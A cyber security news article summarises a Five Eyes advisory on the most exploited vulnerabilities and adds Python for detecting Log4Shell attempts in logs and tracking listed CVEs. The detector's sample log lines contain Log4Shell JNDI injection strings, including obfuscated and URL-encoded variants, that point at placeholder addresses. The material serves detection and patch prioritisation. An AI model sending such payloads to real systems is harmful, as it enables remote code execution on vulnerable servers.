The most exploited cyber security vulnerabilities

The Five Eyes alliance has once again revealed its annual list of the most routinely exploited security vulnerabilities, with Log4Shell among the most abused weaknesses of the year.

The intelligence alliance comprising the UK, US, Australia, Canada, and New Zealand revealed that the most exploited security weaknesses affected a range of products across both public and private sectors.

Internet-facing systems such as email servers and virtual private networks (VPNs) were targeted particularly heavily, with threat actors routinely exploiting publicly known, unpatched vulnerabilities that were in some cases years old.

Microsoft products also dominated the list: the three Exchange Server vulnerabilities chained together as ProxyShell, the four chained together as ProxyLogon, and the ZeroLogon flaw in the Netlogon protocol used by Windows domain controllers all featured in the top 15.

The advisories are published annually and are intended to provide organisations with the information needed to effectively prioritise their mitigation strategies.

“The NCSC and our allies are committed to raising awareness of vulnerabilities and presenting actionable solutions to mitigate them,” said Lindy Cameron, CEO at NCSC. “This advisory places the power in the hands of network defenders to fix the most common cyber weaknesses in the public and private sector ecosystem.”

“Working with our international partners, we will continue to raise awareness of the threats posed by those who seek to harm us.”

Three of the top 15 vulnerabilities also appeared in the previous year’s top 15, a sign that organisations are still failing to patch publicly known, dangerous security weaknesses.

Five Eyes also said in its joint advisory that proof-of-concept code was typically published within two weeks of the public disclosure of the top vulnerabilities. Such rapid distribution of exploitation methodology enabled a broader range of threat actors to capitalise on each weakness, it said.

Patch now: the most-exploited security vulnerabilities

Log4Shell - CVE-2021-44228 - many systems: A flaw in Apache Log4j, a Java logging library found in most organisations’ environments around the world. It carries the maximum 10/10 severity score, and a litany of exploit attempts have been observed since its disclosure in December 2021.
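Log4Shell fires when a string of the form `${jndi:...}` reaches a vulnerable Log4j logger, and attackers routinely hide that string inside nested lookups (`${${lower:j}ndi:...}`, `${::-j}ndi`) or URL-encode it to slip past naive pattern matching, so a detector has to normalise the lookups before searching. The following Python is an added example written for this page, not code from the Five Eyes advisory or from Apache; the access-log lines it scans are constructed, and the addresses and paths in them are placeholders.

```python
import re
from urllib.parse import unquote

# An innermost "${...}" lookup: one that contains no nested "${" or "}".
_INNER = re.compile(r"\$\{[^${}]*\}")
_LOWER = re.compile(r"^\$\{lower:(.*)\}$", re.I)
_UPPER = re.compile(r"^\$\{upper:(.*)\}$", re.I)
# "${anything:-default}" resolves to the default; covers ${::-j} and ${env:NOPE:-j}.
_DEFAULT = re.compile(r"^\$\{.*?:-(.*)\}$")
# The lookup we actually care about once the obfuscation layers are peeled off.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def _resolve(tok: str) -> str:
    """Reduce one innermost lookup roughly as Log4j's substitution would."""
    if (m := _LOWER.match(tok)):
        return m.group(1).lower()
    if (m := _UPPER.match(tok)):
        return m.group(1).upper()
    if (m := _DEFAULT.match(tok)):
        return m.group(1)
    return tok  # unknown lookup (including ${jndi:...} itself) stays as it is


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Undo URL encoding, then resolve nested lookups innermost-first until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def scan_log_lines(lines):
    """Return (line_number, normalized_payload) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append((n, payload))
    return hits


# Constructed access-log lines, not real traffic; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:13:01:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.7:1389/b}"',
    '203.0.113.7 - - [10/Dec/2021:13:01:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/c}"',
    '203.0.113.7 - - [10/Dec/2021:13:01:05 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.7%2Fd%7D HTTP/1.1" 200 "-" "curl/7.79"',
    '198.51.100.4 - - [10/Dec/2021:13:01:06 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Dec/2021:13:01:07 +0000] "GET /?tpl=${env:HOME:-/srv} HTTP/1.1" 200 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, payload in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

A plain search for the literal `jndi` misses the second and third sample lines, which is exactly the gap the normalisation closes. The rules cover only the lookup forms shown (`lower`, `upper`, `:-` defaults and URL encoding), so treat this as a triage filter over web and application logs rather than a complete decoder of every evasion.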

ProxyShell - CVE-2021-34523, CVE-2021-34473, CVE-2021-31207 - Microsoft Exchange Server: A three-vulnerability attack chain, rated 9.8, that combines privilege escalation with arbitrary code execution on the Exchange server. It was used in a score of different attacks, including some by nation-state actors.

ProxyLogon - CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, CVE-2021-26855 - Microsoft Exchange Server: Another serious Exchange flaw built from a multi-vulnerability attack chain. Like ProxyShell, it was used to launch an array of attacks throughout 2021, including ransomware and other malware such as SquirrelWaffle. According to Microsoft’s advisories, ProxyLogon let attackers execute arbitrary code remotely with little technical expertise.

Zoho - CVE-2021-40539 - ManageEngine ADSelfService Plus: An authentication bypass in the REST API of Zoho’s self-service password management and single sign-on (SSO) product that leads to remote code execution; attackers who exploited it went on to enumerate domain accounts and archive files.

Atlassian - CVE-2021-26084 - Confluence Server and Data Center: A 9.8-rated code execution flaw (an OGNL injection) that was ‘massively’ exploited in 2021.

VMware - CVE-2021-21972 - vSphere Client: A 9.8-rated remote code execution vulnerability in a vCenter Server plugin (vRealize Operations) that is reachable through the vSphere Client web interface without authentication.

Microsoft - CVE-2020-0688 - Microsoft Exchange: A remote code execution vulnerability in the Exchange Control Panel, which Microsoft describes as the application failing to properly handle objects in memory. The root cause is that every installation shipped with the same fixed cryptographic validation key, allowing an authenticated attacker to forge serialised requests that run code as SYSTEM.

ZeroLogon - CVE-2020-1472 - Netlogon Remote Protocol: An elevation of privilege vulnerability triggered when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, exploiting a cryptographic flaw in the protocol’s authentication. An unauthenticated attacker on the network who exploits it can run a specially crafted application and take control of the domain controller.

Ivanti - CVE-2019-11510 - Pulse Connect Secure: An unauthenticated arbitrary file read in the popular SSL VPN platform used by large organisations and governments, exploited to harvest credentials and gain access to vulnerable networks. The flaw was even used in Sodinokibi (REvil) ransomware attacks.

Fortinet - CVE-2018-13379 - FortiOS: A path traversal vulnerability in the FortiOS SSL VPN web portal that allows an unauthenticated attacker to download FortiOS system files, including session files containing credentials, through specially crafted HTTP resource requests.

Accellion - CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104 - File Transfer Appliance (FTA): In February 2021, Accellion patched four flaws in its legacy FTA product after detecting attacks against a number of its customers earlier in the year. Cyber security agencies around the world later warned that hackers had continued to exploit the vulnerabilities against targets including multiple layers of government in the US.

VMware - CVE-2021-21985 - vCenter Server: VMware warned customers in May 2021 that ransomware gangs were primed to exploit this vulnerability in the vSphere Client to launch attacks. The flaw is a lack of input validation in the Virtual SAN (vSAN) Health Check plugin, which is enabled by default in vCenter Server, and lets an attacker with network access to the vSphere Client execute commands with unrestricted privileges on the underlying host.

Ivanti - CVE-2021-22893 - Pulse Connect Secure: An authentication bypass that allows remote code execution. At least two major hacking groups deployed a dozen malware families against flaws in the Pulse Connect Secure VPN suite to spy on the US defence sector in 2021. The NCSC issued guidance in May 2021 urging organisations to update their Pulse Connect Secure systems to version 9.1R11.4.

Citrix - CVE-2019-19781 - various products: Several organisations were targeted in early January 2020 through a directory traversal flaw in Citrix Application Delivery Controller (ADC), Citrix Gateway and Citrix SD-WAN WANOP that allowed unauthenticated attackers to achieve arbitrary code execution on the appliance.

Telerik - CVE-2019-18935 - Telerik UI for ASP.NET AJAX: Hackers have been exploiting an RCE flaw in this widely used suite of UI components for web applications since December 2019. The component insecurely deserialises JSON objects in a way that results in RCE on the software’s underlying host.

Microsoft - CVE-2017-11882 - Microsoft Office: Discovered in 2017, this is an RCE bug in the legacy Equation Editor component that exists when the software fails to properly handle objects in memory. If the user is logged in with administrative rights, an attacker who exploits it could take control of the affected system.

Sitecore - CVE-2021-42237 - Sitecore XP: A small number of specific software releases were vulnerable to an insecure deserialisation attack through which an attacker could achieve RCE with no authentication.

ForgeRock - CVE-2021-35464 - ForgeRock Access Management (AM): A Java deserialisation vulnerability in the jato.pageSession parameter that could lead to unauthenticated RCE when a specially crafted request is sent to the server.

SonicWall - CVE-2021-20038 - SMA 100 series: SonicWall published a string of patches for vulnerabilities affecting its Secure Mobile Access (SMA) 100 series products; this one, an unauthenticated RCE caused by a stack-based buffer overflow, was the most severe of the lot with a score of 9.8.

Microsoft - CVE-2021-40444 - MSHTML: An RCE in MSHTML, the browser engine behind Internet Explorer that Office still uses to render embedded web content, was targeted using specially crafted Office documents carrying a malicious ActiveX control. Attackers achieved RCE if they could convince the user to open the malicious document.

Microsoft - CVE-2021-34527 - Windows Print Spooler: Known as PrintNightmare, this vulnerability allowed attackers to run arbitrary code with SYSTEM privileges because the Windows Print Spooler service improperly performed privileged file operations.

Linux - CVE-2021-3156 - sudo, various products: The sudo program, which allows users to run commands with the privileges of another user, was found to have a heap-based buffer overflow (dubbed Baron Samedit) that lets any local user escalate to root.

Checkbox Survey - CVE-2021-27852 - Checkbox Survey: This severe (9.8/10) vulnerability in CheckboxWeb.dll allowed an unauthenticated remote attacker to execute code on a victim’s server. It affected all versions of Checkbox Survey prior to version 7.

SonicWall - CVE-2021-20016 - SSLVPN SMA100: An SQL injection that an unauthenticated remote attacker could exploit to access login credentials and other session-related information.

Microsoft - CVE-2021-1675 - Windows Print Spooler: An RCE that allowed an attacker to execute arbitrary code because the component failed to properly restrict access to certain functionality.

QNAP - CVE-2020-2509 - QTS and QuTS hero: A 9.8-rated command injection vulnerability that allowed attackers to execute arbitrary commands on affected NAS devices.

Cisco - CVE-2018-0171 - IOS and IOS XE: Around 250,000 Cisco network switches running IOS or IOS XE software were exposed through a flaw in the Smart Install client that could lead to RCE or a denial-of-service condition.

Microsoft - CVE-2017-0199 - various products: This vulnerability could lead to RCE due to the way Microsoft Office and WordPad parse specially crafted files containing OLE objects. Successful exploitation could give an attacker full control of the system.
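A list like the one above is only useful once its identifiers end up in the tooling that tracks patch state, and the list itself shows the obstacles: the separators between name, CVE and product vary, several entries carry multiple CVEs, and some IDs are written with a space instead of a hyphen. The following Python is an added example, not code from the Five Eyes advisory or from any vendor: it parses entries in the "Name - CVE - product: summary" form used above (a constructed subset of the entries is embedded), normalises the IDs, flags the years-old class the advisory warns about, and cross-references a constructed scanner export. The advisory year of 2022, the two-year threshold and the host names are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Matches a CVE id while tolerating the "CVE 2019-11510" typo form and lowercase.
CVE_RE = re.compile(r"\bCVE[- ](\d{4})[- ](\d{4,7})\b", re.I)

# One advisory entry: "Name - CVE-..., CVE-... - Product: summary"
# (the separator after the name and after the ids may be "-" or ":").
ENTRY_RE = re.compile(
    r"^(?P<name>[^:]+?)\s*[-:]\s*"
    r"(?P<ids>CVE[- ]\d{4}[- ]\d{4,7}(?:\s*,\s*CVE[- ]\d{4}[- ]\d{4,7})*)"
    r"\s*[-:]\s*(?P<product>[^:]+):\s*(?P<summary>.+)$"
)


@dataclass
class Entry:
    name: str
    cves: list
    product: str
    summary: str


def normalize_cve(raw: str) -> str:
    """Canonical upper-case, hyphenated form, e.g. 'cve 2018-13379' -> 'CVE-2018-13379'."""
    m = CVE_RE.search(raw)
    if not m:
        raise ValueError(f"not a CVE id: {raw!r}")
    return f"CVE-{m.group(1)}-{m.group(2)}"


def parse_advisory(text: str) -> list:
    """Turn the free-text list into Entry records; fail loudly on an unparsed line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            raise ValueError(f"unparsed entry: {line[:40]!r}")
        cves = [normalize_cve(c) for c in re.split(r"\s*,\s*", m.group("ids"))]
        entries.append(Entry(m.group("name").strip(), cves,
                             m.group("product").strip(), m.group("summary").strip()))
    return entries


def years_old(entries, advisory_year: int, threshold: int = 2) -> list:
    """CVEs whose year is at least `threshold` years before the advisory year (assumed cut-off)."""
    return sorted({c for e in entries for c in e.cves
                   if advisory_year - int(c.split("-")[1]) >= threshold})


def match_scanner_export(entries, export_lines) -> dict:
    """Map each advisory CVE present in a scanner export to the hosts reporting it."""
    wanted = {c for e in entries for c in e.cves}
    hits = {}
    for line in export_lines:
        host = line.split(",", 1)[0]
        for m in CVE_RE.finditer(line):
            cve = normalize_cve(m.group(0))
            if cve in wanted:
                hits.setdefault(cve, []).append(host)
    return hits


# Constructed subset of the advisory entries, in the page's own format.
ADVISORY_TEXT = """\
Log4Shell - CVE-2021-44228 - many systems: A flaw in an Apache Java library found in most organisations' environments.
ProxyShell - CVE-2021-34523, CVE-2021-34473, CVE-2021-31207: Microsoft Exchange Server: A three-vulnerability attack chain leading to code execution.
ZeroLogon - CVE-2020-1472 - Netlogon Remote Protocol: Elevation of privilege via a vulnerable Netlogon secure channel connection.
Ivanti - CVE 2019-11510 - Pulse Connect Secure: Hackers exploited the SSL VPN platform to gain access to vulnerable networks.
Fortinet - CVE 2018-13379 - FortiOS: Path traversal in the SSL VPN web portal allowing unauthenticated file download.
Linux - CVE-2021-3156 - sudo, various products: Heap-based buffer overflow in sudo leading to privilege escalation.
"""

# Constructed scanner export lines (host,finding,cve ids); hostnames are placeholders.
SCANNER_EXPORT = [
    "vpn01.example.internal,Pulse Connect Secure file read,cve-2019-11510",
    "fw-edge.example.internal,FortiOS SSL VPN path traversal,CVE-2018-13379",
    "dc01.example.internal,Netlogon privilege escalation,CVE-2020-1472;CVE-2020-1350",
    "web02.example.internal,Outdated OpenSSL,CVE-2021-3449",
]

if __name__ == "__main__":
    entries = parse_advisory(ADVISORY_TEXT)
    print("years-old:", years_old(entries, 2022))
    for cve, hosts in match_scanner_export(entries, SCANNER_EXPORT).items():
        print(cve, "->", ", ".join(hosts))
```

The normalised set is what you feed into a scanner filter or a SIEM lookup table; the three hosts the sample export flags are exactly the pre-2021 VPN and domain controller weaknesses the advisory singles out as still being exploited.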

Connor Jones
News and Analysis Editor

Connor Jones has been at the forefront of global cyber security news coverage for the past few years, breaking developments on major stories such as LockBit’s ransomware attack on Royal Mail International, and many others. He has also made sporadic appearances on the ITPro Podcast discussing topics from home desk setups all the way to hacking systems using prosthetic limbs. He has a master’s degree in Magazine Journalism from the University of Sheffield, and has previously written for the likes of Red Bull Esports and UNILAD tech during his career that started in 2015.